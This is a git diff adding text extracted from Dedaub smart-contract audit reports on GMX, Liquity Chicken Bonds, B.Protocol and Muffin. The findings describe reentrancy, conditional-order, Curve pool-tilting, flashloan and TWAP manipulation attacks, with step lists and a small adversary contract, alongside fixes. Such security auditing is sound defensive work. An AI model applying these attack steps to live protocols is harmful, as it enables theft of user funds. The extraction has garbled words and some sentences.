diff --git a/.gitmodules b/.gitmodules index 62c231b..ca2100f 100644 --- a/.gitmodules +++ b/.gitmodules @@ -4,3 +4,6 @@ [submodule "pdfs/dedaub-audits"] path = pdfs/dedaub-audits url = https://github.com/Dedaub/audits +[submodule "pdfs/publications"] + path = pdfs/publications + url = https://github.com/trailofbits/publications.git diff --git a/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt b/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt new file mode 100644 index 0000000..bba474e --- /dev/null +++ b/findings_newupdate/dedaub/GMX _ GMX Audit - Oct '22.txt @@ -0,0 +1,13 @@ +C1 Reentrancy vulnerability in cancelOrde STATUS OPEN OrderHandler::cancelOrder, which is an external function, is not protected by a reentrancy guard. Moreover, OrderUtils::cancelOrder (which performs the actual operation) transfers funds to the user (orderStore.transferOut) before updating its state. As a consequence, a malicious adversary could re-enter in cancelOrder, and execute an arbitrary number of transfers, eectively draining the contracts full balance in the corresponding token. function cancelOrder( DataStore dataStore, EventEmitter eventEmitter, OrderStore orderStore, bytes32 key, address keeper, uint256 startingGas ) internal { Order.Props memory order = orderStore.get(key); validateNonEmptyOrder(order); if (isIncreaseOrder(order.orderType()) || isSwapOrder(order.orderType())) { if (order.initialCollateralDeltaAmount() > 0) { orderStore.transferOut( EthUtils.weth(dataStore), order.initialCollateralToken(), order.initialCollateralDeltaAmount(), order.account(), order.shouldConvertETH() ); } } // Dedaub: state changed after the transfer, also idempotent orderStore.remove(key, order.account()); Note that the main re-entrancy method, namely the receive hook of an ETH transfer, is in fact protected by using payable(receiver).transfer which limits the gas available to the adversarys receive hook. Nevertheless, an ER +C20 token transfer is an external contract call and should be assumed to potentially pass the execution to the adversary. For instance, an ERC777 token (which is ERC20 compatible) would implement transfer hooks that could easily be used to perform a reentrancy aack. Note also that the state update (orderStore.remove(key, order.account())) is idempotent, so it can be executed multiple times during a reentrancy aack without causing an error. To protect against reentrancy we recommend 1. Adding reentrancy guards, and 2. Execute all state updates before external contract calls (such as transfers). Note that (2) by itself is suicient, so reentrancy guards could be avoided if gas is an issue. In such a case, however, comments should be added to the code to clearly state that updates should be executed before external calls, to avoid a vulnerability being reintroduced in future restructuring of the code. HIGH SEVERITY: ID Description STATUS +H1 Conditional execution of orders using shouldConvertETH OPEN For all order types that involve ETH, a user can set the option shouldConvertETH =true to indicate that he wishes to receive ETH instead of WETH. Although convenient, this gives an adversary the opportunity to execute conditional orders in a very easy way. The adversary can simply use a smart contract as the receiver of the order, and set a receive function as follows: contract Adversary { bool allow_execution = false; receive() { require(allow_execution); } } Then, in the time period between the order creation and its execution, the adversary can decide whether he wishes the order the allow_execution variable accordingly. If unset, the receive function will revert and the protocol will cancel the order. to succeed or not, and set The possibility of conditional executions could be exploited in a variety of dierent scenarios, a concrete example is given at the end of this item. Note that the use of payable(receiver).transfer (in Bank::_transferOutEth) does not protect against this aack. The 2300 gas sent by transfer are enough for a simple check like the one above. Note also that, although the case of ETH is the simplest to exploit, any tokens that use hooks to allow the receiver to reject transfers (eg ERC777) would enable the same aack. Note also that, if needed, the time period between creation and execution could be increased by simultaneously submiing a large number of orders for tiny amounts (see L2 below). One way to protect against conditional execution is to employ some manual procedure for recovering the funds in case of a failed execution (for instance, keeping the funds in an escrow account), instead of simply canceling the order. Since a failed execution should not happen under normal conditions, this would not aect the protocols normal operation. Concrete example of exploiting conditional executions: The adversary wants to take advantage of the volatility of ETH at a particular moment, but without any trading risk. Assume that the current price of ETH is 1000 USD, he proceeds as follows: - He creates a market swap order A to buy ETH at the current price. In this order, he sets shouldConvertETH = true and the receive function above that conditionally allows the execution. - He also creates a limit order B to sell ETH at 1010 USD. He then monitors the price of ETH before the orders execution: - If ETH goes down, he does nothing. allow_execution is false so order A will fail, and order B will also fail since the price target is not met. - If ETH goes up, he sets allow_execution = true, which leads to both orders succeeding for a prot of 10 USD / ETH. 9 MEDIUM SEVERITY: ID Description +M1 Incorrect handling of rebalancing token STATUS OPEN StrictBank::recordTokenIn computes the number of received tokens by comparing the contract's current balance with the balance at the previous execution. However, this approach could lead to incorrect results in the case of ER +C20 tokens with non-standard behavior, for instance: - Tokens in which balances automatically increase (without any transfers) to include interest. - Tokens that allow interacting from multiple contract addresses To be more robust with respect to such types of tokens, we recommend comparing the balance before and after the current incoming transfer, and not between dierent transactions. +M2 Self-close bad debt aack OPEN The protocol is susceptible to an aack involving opening a delta neutral position using Sybil accounts, with maximum leverage, on a volatile asset. Scenario: 1. Aacker controls Alice and Bob 2. Alice opens a large long position with maximum leverage 3. Bob opens a large short position with maximum leverage 4. Market moves 5. Alice liquidates their underwater position, causing bad debt 6. Bob closes their other position, proting on the slippage The reason why this aack is possible is that using the current design, it takes multiple blocks for a liquidator to react and by that time their order is executed it is possible that one of the positions is underwater. Secondly, when liquidating, Alice does not suer a bad price from the slippage incurred in the liquidation but Bob benets from the 1 slippage, when closing their position just after. Another factor that contributes towards this aack is that the liquidation penalty is linear, while the price impact advantage is higher-order, making the aack increasingly protable the larger the positions. To deter this, the protocol could support (i) partial liquidations for large positions and therefore force the positions to be closed gradually, making the aack non-viable, and, (ii) slippage open-interest calculations used to determine the price of the liquidation. LOW SEVERITY: +L1 Missing receive function OPEN OrderStore does not contain a receive function so it cannot receive ETH. However, this is needed by Bank::_transferOutEth, which withdraws ETH before sending it to the receiver. function _transferOutEth(address token, uint256 amount, address receiver) internal { require(receiver != address(this), "Bank: invalid receiver"); IWETH(token).withdraw(amount); payable(receiver).transfer(amount); _afterTransferOut(token); } WIthout a receive function any transaction with shouldConvertETH = true would fail. 1 +L2 No lower bounds for swaps and positions OPEN Since there are no lower bounds for the size of a position, someone could in principle create a large number of tiny orders. Such a strategy would cost the adversary only the gas fees and the total amount of the requested positions, which can be as small as he wishes. In this 2-step procedure used in this version of the protocol, such a behavior could potentially create a problem, because the order keepers would have to execute a huge number of orders. We suggest seing a minimum size for positions and swaps. L3 Inconsistency in calculating liquidations OPEN The comment in PositionUtils::isPositionLiquidatable indicates that price impact is not used when computing whether a position is liquidatable. However, the price impact is in fact used in the code: // price impact is not factored into the liquidation calculation // if the user is able to close the position gradually, the impact // may not be as much as closing the position in one transaction function isPositionLiquidatable( DataStore dataStore, Position.Props memory position, Market.Props memory market, MarketUtils.MarketPrices memory prices ) internal view returns (bool) { ... int256 priceImpactUsd = PositionPricingUtils.getPriceImpactUsd(...) int256 remainingCollateralUsd = collateralUsd.toInt256() + positionPnlUsd + priceImpactUsd + fees.totalNetCostAmount; 1 On the other hand, when the liquidation is executed, the price impact is not used. The comment in DecreasePositionUtils::processCollateral indicates that this is intentional: // the outputAmount does not factor in price impact // for example, if the market is ETH / USD and if a user uses USDC to long ETH // if the position is closed in profit or loss, USDC would be sent out from or // added to the pool without a price impact // this may unbalance the pool and the user could earn the positive price impact // through a subsequent action to rebalance the pool // price impact can be factored in if this is not desirable If this inconsistency is intentional, it should be properly documented in the comments. Note that, when deciding on a liquidation strategy, you should have in mind the possibility of cascading liquidations, namely the possibility that executing a liquidation causes other positions to become liquidatable. CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have signicant centralization threats.) 1 ID Description +N1 Order keepers can cause DoS in all operations OPEN Due to the two step execution system, any operation requires an order keeper to execute it. Trust is needed in that order keepers will timely execute all pending orders. If the order keeper does not submit execution transactions, all operations will cease to function, including closing positions and withdrawing funds. It would be benecial to implement fallback mechanisms that guarantee that users can at least withdraw their funds in case order keepers cease to function for any reason. For instance, the protocol could allow users to execute orders by providing oracle prices themselves, but only if an order is stale (a certain time has passed since its creation). N2 Order keepers can frontrun/reorder transactions There is nothing in the current system that prevents an order keeper from front-running or reordering transactions, for instance to exploit changes in the price impact. The protocol could include mechanisms that limit this possibility: for instance, the order keeper could be forced to execute orders in the same order they were created. OTHER / ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 Possible erroneous computation of price impact STATUS INFO 1 imbalance) ^ (price impact exponent) * (price impact factor) - (next Price impact is calculated as (initial imbalance) ^ (price impact exponent) * (price impact factor) The values of exponent (e) and impact factor (f) are set by the protocol for each market. If the impact factor is simply a percentage, then the price impact will have units USD^(price impact exponent). But this seems erroneous, since price impact is treated as a USD amount which is nally added to the amount requested by the user. A problem arises in case that these two quantities are selected independently of each other but also of the pool's deposits and status. For example, consider a pool with tokens A and B of total USD value x and y respectively. Consider that x < y. Then the imbalance equals d = y - x. If a user swaps A tokens of worth d/2, then prior to the price impact he will get B tokens of the same value. The new deposits of the pool will now be x'=y'=(x+y)/2 and the pool will become balanced. The price impact for this transaction is f*d^e, which could be ( if the parameters are not chosen carefully) larger than d/2, which is the requested swap amount. Also, this fact could lead to a pool which is even more imbalanced than the previous state. We suggest that (total_deposits)^(e-1)*f always be less than 1 to avoid the above mentioned undesirable behavior. +A2 Inconsistency in the submission time of dierent tokens INFO Price keepers are responsible for submiing prices for most of the protocol's tokens. The submied price should be the price retrieved from exchange markets at the time of each order's creation (the median of all these prices is nally used). However, for some tokens Chainlink oracles are used. In this case, the price at the time of the order execution is used. +A3 A user can liquidate its own position INFO there is nothing preventing a user ExchangeRouter::createLiquidation can be called only by liquidation keepers. However, from calling createOrder with orderType=Liquidation, eectively creating a liquidation order for their own position. Although this is not necessarily an issue, it is unclear whether this functionality is intentional or not. 1 +A4 Ineicient price impacts on large markets INFO The price impact calculation is a function with an exponential factor of the absolute dierences between open long and short interests before and after a trade. This works well for the average market, but on a large market with large open interests, it is not more eicient to open large positions. Consider that in other AMM designs, it is possible to open large positions with minimal price impact if the market is large (e.g., Uniswap ETH-USDC). A5 Known compiler bugs INFO The code can be compiled with Solidity 0.8.0 or higher. For deployment, we recommend no floating pragmas, but a specic version, to be condent about the baseline guarantees oered by the compiler. Version 0.8.0, in particular, has some known bugs, which we do not believe aect the correctness of the contracts. 1 diff --git a/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt b/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt new file mode 100644 index 0000000..0997352 --- /dev/null +++ b/findings_newupdate/dedaub/Liquity _ B.Protocol - Chicken Bonds Audit.txt @@ -0,0 +1,4 @@ +M1 The integration of ChickenBonds with BAMM allows limited nancial manipulation (aacker can get maximum discount STATUS RESOLVED (commit a55871ec takes the Curve LUSD, in virtual terms, also into account) BAMMSP holds not only LUSD, but also ETH from liquidations. Anyone can buy ETH at a discount, which depends on the relative amounts of LUSD and ETH of the BAMMSP. In essence, the larger the amount of ETH compared to LUSD, the larger the discount. An aacker could act as follows: call shiftLUSDFromSPToCurve of the Chicken Bond protocol, decrease the amount of LUSD in BAMMSP and then buy ETH at a greater discount. There are no restrictions on who can call the shiftLUSDFromSPToCurve function, but the shift of the LUSD amounts takes place only if the LUSD price in Curve is too high. If this condition is satised, the aacker can perform the aack in order to buy ETH at a maximum discount at no extra cost. If not, then the aacker should rst manipulate the price at Curve using a flashloan. The steps are the following: 1.Increase the price of LUSD in Curve pool - above the threshold which allows shift from the SP to Curve - possibly using a flashloan. 0 2. Call shiftLUSDFromSPToCurve and move as many LUSD as possible to increase the discount on ETH 3. Buy ETH from BAMMSP at a discount. 4. Repay the flashloan. This aack is protable in a specic price range for LUSD, close to the too high threshold (otherwise the cost of tilting the pool will likely outweigh any benet from the discount), and the discount is bounded (at 4%, based on the design documents we were supplied). Hence, we consider this only a medium-severity issue. A general consideration of the protability of the aack should consider: a) that the second step drops the price of LUSD in Curve, resulting in losses for the aacker when he repays the flashloan at the 4th step. the amount of ETH the aacker can buy from BAMMSP at discount is b) However, independent from the amounts in the Curve pool, therefore under some circumstances the discount may also compensate for the losses making the aack protable. +M2 Uniswap v3 TWAPs can be manipulated, and this will become much easier post-Merge DISMISSED A Uniswap v3 TWAP is expected to be used to price LQTY relative to ETH. Uniswap v3 TWAPs can be manipulated, especially for less-used pools. (There have been at least three instances of aacks already, for pools with liquidity in the low millions. The LQTY-ETH pool currently has $780K of liquidity.) Although currently manipulation for active pools is considered rarely protable, once Ethereum switches to proof-of-stake (colloquially, after the Merge) such manipulation will be much easier to perform with guaranteed prot. Specically, to manipulate a data point used for a Uniswap v3 TWAP, an aacker needs to control two consecutive pool transactions (i.e., transactions over the manipulated pool) that are in separate blocks. (This typically means the last pool transaction of a block and the rst of the next block.) Under Ethereum proof-of-stake, validators are known in advance (at the beginning of the epoch) hence an aacker 0 can know when they are guaranteed to control the validator of the next block. The aack is: The aacker places the rst transaction as the last pool transaction of the previous block (either by being the validator of both blocks or using flashbots). The rst transaction tilts the pool. The aacker is guaranteed to not suer any losses from swaps over the the tilted pool because the aacker controls the unrealistic price of immediately next block, prepending to it a transaction that restores the pool, while aecting a TWAP data point in this way. The issue is at most medium-severity, because it only concerns selling LQTY, not the principal assets of the contracts. M3 Values from Chainlink are not checked DISMISSED in The protocol does not check whether the LUSD-USD price is successfully returned from in Chainlink GemSeller::compensateForLusdDeviation. Since this price is used to adjust the amount of ETH or LQTY returned by a swap in BAMM and GemSeller respectively, it is important to ensure that the values from Chainlink are accurate and correct. BAMM::compensateForLusdDeviation and is This in contrast with how Chainlink ETH-USD prices are retrieved in BAMM::fetchPrice and GemSeller::fetchPrice, where each call to Chainlink is checked and any failures are reported using a return value of 0. LOW SEVERITY: [No low severity issues] CENTRALIZATION ISSUES: It is often desirable for DeFi protocols to assume no trust in a central authority, including the protocols owner. Even if the owner is reputable, users are more likely to engage with 0 a protocol that guarantees no catastrophic failure even in the case the owner gets hacked/compromised. We list issues of this kind below. (These issues should be considered in the context of usage/deployment, as they are not uncommon. Several high-prole, high-value protocols have centralization threats.) ID Description N1 Owner can set parameters with nancial impact STATUS DISMISSED The owner of both the BAMM contract and the GemSeller contract can set several parameters with nancial impact. None is a major threat: the principal deposited by the Chicken Bonds protocol is safe, even if the owner of BAMM is malicious. However, some funds are at threat. Specically: (BAMM) Owners can set the chicken address. The chicken address holds considerable control over the protocol, as it is the only address permied to withdraw or deposit funds in the system. However, since this address can only ever be set once, the risk posed is limited. Once this address is set to the ChickenBondManager contract from the LUSD Chicken Bonds Protocol, this will no longer be an issue, as ChickenBondManager is itself very decentralized. (BAMM) Owners can set the gemSeller address. This is a centralization threat because gemSeller has innite approval for gem, in this case LQTY. However, this means that a malicious owner can only steal rewards, not principal. Furthermore, the gemSellerController makes use of a time lock system. This prevents the owner from immediately changing the address of the gemSeller. A new address will rst be stored as pending, and can only be set as the new gemSeller after a xed time period has elapsed. Once set, the gemSeller has maximum approval for all LQTY held in the B.AMM. (BAMM and gemSeller) Owners can set parameters, including fee and A. The fee parameter is a threat, but is bounded by a maximum value (1% in BAMM, 10% in gemSeller). The A parameter only aects the discount given to buyers, which is bounded by a maximum, limiting the eect of any changes. 0 OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 Typo in BAMM::constructor parameter STATUS RESOLVED Parameter address _fronEndTag should be address _frontEndTag. +A2 Misrepresentative function names when converting LUSD RESOLVED The functions gemSeller::gemToLUSD and gemSeller::LUSDToGem convert the given quantity of gem tokens to their LUSD value and vice versa. However, the functions both return the USD price of the gem asset, not the LUSD price (more accurately, the GEM-ETH and ETH-USD prices are used together). Although the protocol assumes that 1 LUSD is always equivalent to 1 USD, gemSeller::gemToUSD and gemSeller::USDToGem would be more accurate function names. A3 Compiler bugs INFO The code is compiled with Solidity 0.6.11. This version of the compiler has some known bugs, which we do not believe to aect the correctness of the contracts. 01 diff --git a/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt new file mode 100644 index 0000000..4eab5b5 --- /dev/null +++ b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Audit.txt @@ -0,0 +1,5 @@ +H1 Stability Pool deposits can be manipulated for possible gai STATUS RESOLVED (mitigated by commit cf15a5ac: time delay for shifting, limited shift window) The Chicken Bonds protocol gives arbitrary callers the ability to shift liquidity out of the stability pool and into Curve, when the price of LUSD (on Curve) is too high. This can be abused for a nancial aack if the protocol (i.e., the B.AMMSP) becomes a major shareholder of stability pool liquidity, as expected. Consider a scenario where the aacker notices a large liquidation coming in. Stability pool shareholders stand to gain up to 10%. The aacker wants to eliminate the B.AMMSP share from the stability pool and receive a larger part of the gains. The aacker can tilt the Curve pool (e.g., via flashloan) to get the LUSD price to be outside the of subsequent (too shiftLUSDFromSPToCurve, liquidity gets removed from the stability pool. high). With acceptable threshold call a H2 An aack tilting the Curve pool before a redeem allows the aacker to draw funds from the permanent bucket RESOLVED (commit 900d481a makes all Curve accounting be in virtual/relative terms) There is a Curve-pool-tilt aack upon a redeem operation. The core of the issue is the maintaining between transactions of a storage variable, permanentLUSDInCurve: 0 uint256 private permanentLUSDInCurve; // Yearn Curve LUSD-3CRV vault function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDCurveIncrease = (lusdInCurve - lusdInCurveBefore) * ratioPermanentToOwned / 1e18; permanentLUSDInCurve += permanentLUSDCurveIncrease; ... } function shiftLUSDFromCurveToSP(uint256 _maxLUSDToShift) external { ... uint256 permanentLUSDWithdrawn = lusdBalanceDelta * ratioPermanentToOwned / 1e18; permanentLUSDInCurve -= permanentLUSDWithdrawn; ... } The problem is that this quantity does not really reflect current amounts of LUSD in Curve, which are subject to fluctuations due to normal swaps or malicious pool manipulation. The permanentLUSDInCurve is then used in the computation of acquired LUSD in Curve: function getAcquiredLUSDInCurve() public view returns (uint256) { uint256 acquiredLUSDInCurve; // Get the LUSD value of the LUSD-3CRV tokens uint256 totalLUSDInCurve = getTotalLUSDInCurve(); if (totalLUSDInCurve > permanentLUSDInCurve) { acquiredLUSDInCurve = totalLUSDInCurve - permanentLUSDInCurve; } return acquiredLUSDInCurve; } A redeem computes the amount to return to the caller using the above function, as a proportion of the acquired LUSD in Curve: 0 function redeem(uint256 _bLUSDToRedeem, uint256 _minLUSDFromBAMMSPVault) external returns (uint256, uint256) { uint256 acquiredLUSDInCurveToRedeem = getAcquiredLUSDInCurve() * uint256 lusdToWithdrawFromCurve = acquiredLUSDInCurveToRedeem * (1e18 - redemptionFeePercentage) / 1e18; fractionOfBLUSDToRedeem / 1e18; uint256 acquiredLUSDInCurveFee = acquiredLUSDInCurveToRedeem - lusdToWithdrawFromCurve; yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdToWithdrawFromCurve); if (yTokensFromCurveVault > 0) { yearnCurveVault.transfer(msg.sender, yTokensFromCurveVault); } As a result, the aack consists of lowering the price of LUSD in Curve, by swapping a lot of LUSD, so that the Curve pool has a much larger amount of LUSD. The permanentLUSDInCurve remains as stored from the previous transaction and gets subtracted, so that the acquired LUSD in Curve appears to be much higher. The aacker calls redeem and receives a proportion of that amount (minus fees), eectively stealing from the permanent LUSD. The general recommendation is to not store between transactions any amount reflecting Curve balances (either total or partial). If a partial balance is to be kept, it should be kept in relative terms (i.e., a proportion) not absolute token amounts. MEDIUM SEVERITY: [No medium severity issues] LOW SEVERITY: ID Description 07 STATUS L1 Unsafe Curve operation (on possibly tilted pool) upon _firstChickenI RESOLVED (commit 30c45567: depletion of bLUSD prevented) [This issue is rated low severity because a rstChickenIn after initial deployment is unlikely. The core threat remains.] The code of firstChickenIn eectively performs an unprotected swap of the full balance of Curve yield at the time (a remove_liquidity_one_coin functionally includes a swap): function _firstChickenIn(uint256 _bondStartTime, uint256 _bammLUSDValue, uint256 _lusdInBAMMSPVault) internal returns (uint256) { // From Curve Vault uint256 lusdFromInitialYieldInCurve = getAcquiredLUSDInCurve(); uint256 yTokensFromCurveVault = _calcCorrespondingYTokensInCurveVault(lusdFromInitialYieldInCurve); // withdraw LUSD3CRV from Curve Vault if (yTokensFromCurveVault > 0) { _withdrawFromCurveVaultAndTransferToRewardsStakingContract( yTokensFromCurveVault); } } function _withdrawFromCurveVaultAndTransferToRewardsStakingContract( uint256 _yTokensToSwap) internal { uint256 LUSD3CRVBalanceBefore = curvePool.balanceOf(address(this)); yearnCurveVault.withdraw(_yTokensToSwap); uint256 LUSD3CRVBalanceDelta = curvePool.balanceOf(address(this)) - LUSD3CRVBalanceBefore; // obtain LUSD from Curve if (LUSD3CRVBalanceDelta > 0) { uint256 lusdBalanceBefore = lusdToken.balanceOf(address(this)); // Dedaub: attackable! curvePool.remove_liquidity_one_coin(LUSD3CRVBalanceDelta, 0 INDEX_OF_LUSD_TOKEN_IN_CURVE_POOL, 0); uint256 lusdBalanceDelta = lusdToken.balanceOf(address(this)) - _transferToRewardsStakingContract(lusdBalanceDelta); lusdBalanceBefore; } } If the yield thats being swapped is ever high, an aacker can tilt the Curve pool to make LUSD appear very expensive and make the remove_liquidity_one_coin return much lower amounts, eectively making the contract spend its Curve LP tokens for nothing in return. (The aacker will receive the proceeds upon restoring the pool.) This aack is currently highly unlikely because a real rst-ever chicken in will nd no past yield a subsequent firstChickenIn is unlikely to occur because there is signicant nancial motivation for the last bLUSD holders to not redeem, if there is yield. So it is unlikely that the balance of bLUSD will ever again drop to zero. OTHER/ ADVISORY ISSUES: This section details issues that are not thought to directly aect the functionality of the project, but we recommend considering them. ID Description +A1 Simplication in exponentiation STATUS RESOLVED Iterative exponentiation by squaring (ChickenMath::decPow) could be simplied slightly from: while (n > 1) { if (n % 2 == 0) { x = decMul(x, x); 0 n = n / 2; } else { // if (n % 2 != 0) y = decMul(x, y); x = decMul(x, x); n = (n - 1) / 2; } } to: while (n > 1) { if (n % 2 != 0) { y = decMul(x, y); } x = decMul(x, x); n = n / 2; } We only recommend this change for reasons of elegance, not impact. +A2 Assert unnecessary RESOLVED There is an assert statement in _firstChickenIn that is currently unnecessary. function _firstChickenIn(...) internal returns (uint256) { assert(!migration); The function is currently only called under conditions that preclude the assert: if (bLUSDToken.totalSupply() == 0 && !migration) { lusdInBAMMSPVault = _firstChickenIn(bond.startTime, bammLUSDValue, lusdInBAMMSPVault); } More generally, although there is a long-standing software engineering practice encouraging asserts for circumstances that should never arise, we discourage their use in deployed blockchain code, since asserts in the EVM do have a run-time cost. +A3 Unnecessary computation of minimum DISMISSED, INVALID 01 (will remove) The minimum computation in the code below has a pre-determined outcome: function shiftLUSDFromSPToCurve(uint256 _maxLUSDToShift) external { (uint256 bammLUSDValue, uint256 lusdInBAMMSPVault) = _updateBAMMDebt(); uint256 lusdOwnedInBAMMSPVault = bammLUSDValue - pendingLUSD; // Make sure pending bucket is not moved to Curve, so it can be // withdrawn on chicken out uint256 clampedLUSDToShift = Math.min(_maxLUSDToShift, lusdOwnedInBAMMSPVault); // Make sure there's enough LUSD available in B.Protocol clampedLUSDToShift = Math.min(clampedLUSDToShift, lusdInBAMMSPVault); // Dedaub: the above is unnecessary. _updateBAMMDebt has its first // return value always be <= the second. So, clampedLUSTToShift // (which is <= _bammLUSDValue) will always be <= lusdInBAMMSPVault +A4 Mistake in README.md INFO (RESOLVED) Under the section Shifter functions::Spot Price Thresholds, the conditions under which shifts are allowed are incorrect. The correct conditions should read: Shifting from the Curve to SP is possible when the spot price is < x, and must not move the spot price above x. Shifting from SP to the Curve is possible when the spot price is > y, and must not move the spot price below y. A5 Compiler bugs INFO (RESOLVED) The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, so as to be condent about the baseline 01 guarantees oered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to aect the correctness of the contracts. CENTRALIZATION ASPECTS The design of the protocol is highly decentralized. The creation of bonds, chickening in/out and redemption of bLUSD tokens is all carried out without any intervention from governance. The shifter functions, ChickenBondManager::shiftLUSDFromSPToCurve and ChickenBondManager::shiftLUSDFromCurveToSP, which move LUSD between the Liquity stability pool and the curve pool are also public and permissionless. The Yearn Governance address holds control of the protocols migration mode which prevents the creation of new bonds, among other changes. There is no way to deactivate migration mode. Although new users will not be able to join the protocol, all current users will still be able to retrieve their funds, either through ChickenBondManager::chickenOut or ChickenBondManager::redeem. Yearn governance decisions are voted on by all YFI token holders and are executed by a 6-of-9 Multisig address. 01 diff --git a/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt new file mode 100644 index 0000000..fa1c429 --- /dev/null +++ b/findings_newupdate/dedaub/Liquity _ Chicken Bonds Delta Audit (NFT additions).txt @@ -0,0 +1,2 @@ +A1 Sub-optimal gas behavior in BondExtraData STATUS RESOLVED (commit a60f451f) The BondExtraData struct is designed to t in one storage word: struct BondExtraData { uint80 initialHalfDna; uint80 finalHalfDna; uint32 troveSize; // Debt in LUSD uint32 lqtyAmount; // Holding LQTY, staking or deposited into Pickle uint32 curveGaugeSlopes; // For 3CRV and Frax pools combined } (We note, in passing, that the uint32 amounts are rounded down, so dierent underlying amounts can map to the same recorded amount. This seems like an extremely minor inaccuracy but it also pertains to issue L1, of NFT manipulation.) The result of ing the struct in a single word is that the following code is highly suboptimal, gas-wise, requiring 4 separate SSTOREs, but also SLOADs of values before the SSTORE (so that unaected bits get preserved): function setFinalExtraData(address _bonder, uint256 _tokenID, uint256 _permanentSeed) external returns (uint80) { 0 idToBondExtraData[_tokenID].finalHalfDna = newDna; idToBondExtraData[_tokenID].troveSize = _uint256ToUint32(troveManager.getTroveDebt(_bonder)); idToBondExtraData[_tokenID].lqtyAmount = _uint256ToUint32(lqtyToken.balanceOf(_bonder) + lqtyStaking.stakes(_bonder) + pickleLQTYAmount); idToBondExtraData[_tokenID].curveGaugeSlopes = _uint256ToUint32((curveLUSD3CRVGaugeSlope + curveLUSDFRAXGaugeSlope) * CURVE_GAUGE_SLOPES_PRECISION); We recommend using a memory record of the struct, reading its original value from storage, updating the 4 elds in-memory, and storing back to idToBondExtraData[_tokenID]. The Solidity compiler could conceptually optimize the above paern, but current versions do not even aempt such an optimization in the presence of internal calls, let alone external calls. (We also ascertained that the resulting bytecode is suboptimal under the current build seings of the repo.) +A2 Possibly extraneous check RESOLVED (commit f5fb7f16) Under the, relatively reasonable, assumption that MIN_BOND_AMOUNT is never zero, the rst of the following checks would be extraneous: function createBond(uint256 _lusdAmount) public returns (uint256) { _requireNonZeroAmount(_lusdAmount); _requireMinBond(_lusdAmount); A3 Compiler bugs INFO (RESOLVED) 0 The code is compiled with Solidity 0.8.10 or higher. For deployment, we recommend no floating pragmas, i.e., a specic version, so as to be condent about the baseline guarantees oered by the compiler. Version 0.8.10, in particular, has some known bugs, which we do not believe to aect the correctness of the contracts. diff --git a/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt b/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt index d076b19..7f0ded0 100644 --- a/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt +++ b/findings_newupdate/dedaub/Muffin Finance _ Muffin Audit Report.txt @@ -6,7 +6,7 @@ A2 Misleading variables naming DISMISSED In SwapMath.sol, functions calcTierAmts Q200 + amount) numerator of sqrt lambda (sum of UQ128) are falsely named since num is actually the denominator and denom the numerator of the solution. In function _ceilMulDiv in the same le, the name denom is used correctly. 01 A3 Fallback/proxy code not compatible with further Solidity calls INFO The fallback code of MuinHub is used to proxy (via delegatecall) into MuinHubPositions. This is a simple way to split the contract functionality into two, avoiding the Ethereum contract size restrictions. The code used to proxy is taken from an OpenZeppelin proxy implementation. fallback() external { address _positionController = positionController; assembly { calldatacopy(0, 0, calldatasize()) let result := delegatecall(gas(), _positionController, 0, calldatasize(), 0, 0) returndatacopy(0, 0, returndatasize()) switch result case 0 { revert(0, returndatasize()) } default { return(0, returndatasize()) } } } Out of an abundance of caution, we warn that this implementation explicitly assumes that, upon return from the delegatecall, no further Solidity code will run: the return data is wrien in memory position 0, overwriting the Solidity scratchpad memory. There is currently no issue with this practice in the Muin code: the fallback function cannot be called in a context that returns to Solidity code. However, given that the code base uses MultiCall (elsewhere) developers should be warned of the danger of possibly adding MultiCall functionality to MuinHub in the future: a call delegated through the fallback function will return and further calls will be issued. Without much further low-level exploration, it is not clear that the memory state of MultiCall logic can be indeed aected, and even less that a security issue can arise from such a combination of MultiCall and the above fallback function, but the possibility is suicient for an advisory note. 01 A4 Assert statements are used to catch invalid inputs INFO The Solidity assert statement is best used to signal that a condition that should never arise (i.e., it represents a logical or code error) has occurred. In contrast, require is the standard way to check for invalid inputs. The codebase often fails via an assert and not a require for invalid inputs. The main example is operations in the Math library: library Math { /// @dev Compute z = x + y, where z must be non-negative /// and fit in a 96-bit unsigned integer function addInt96(uint96 x, int96 y) internal pure returns (uint96 z) { unchecked { int256 s = int256(uint256(x)) + int256(y); assert(s >= 0 && s <= int256(uint256(type(uint96).max))); z = uint96(uint256(s)); } } ... function toInt96(uint96 x) internal pure returns (int96 z) { assert(x <= uint96(type(int96).max)); z = int96(x); } The above function, toInt96, for instance, is used in one of the most major safeguards in the system: in checking that the liquidity parameter supplied to a burn operation (an unsigned integer) does not become negative when cast into a signed integer. (Having this would enable an aacker to burn a negative amount of liquidity, i.e., to add enormous liquidity at will.) Therefore, the assert checks external input and should be a require. It is possible that the developers considered this and chose the assert in order to cause greater damage (by burning all supplied gas, as assert does) to a caller that supplies such invalid values. However, the practice is still questionable. -A5 Misleading comments RESOLVED 01 In library Ticks.sol the NatSpec comments explaining a Ticks parameters needSettle0, needSettle1 refer to false limit order types: * @param needSettle0 boundary at this tick (i.e. 0 -> 1 limit orders) * @param needSettle1 boundary at this tick (i.e. 1 -> 0 limit orders) True if needed to settle 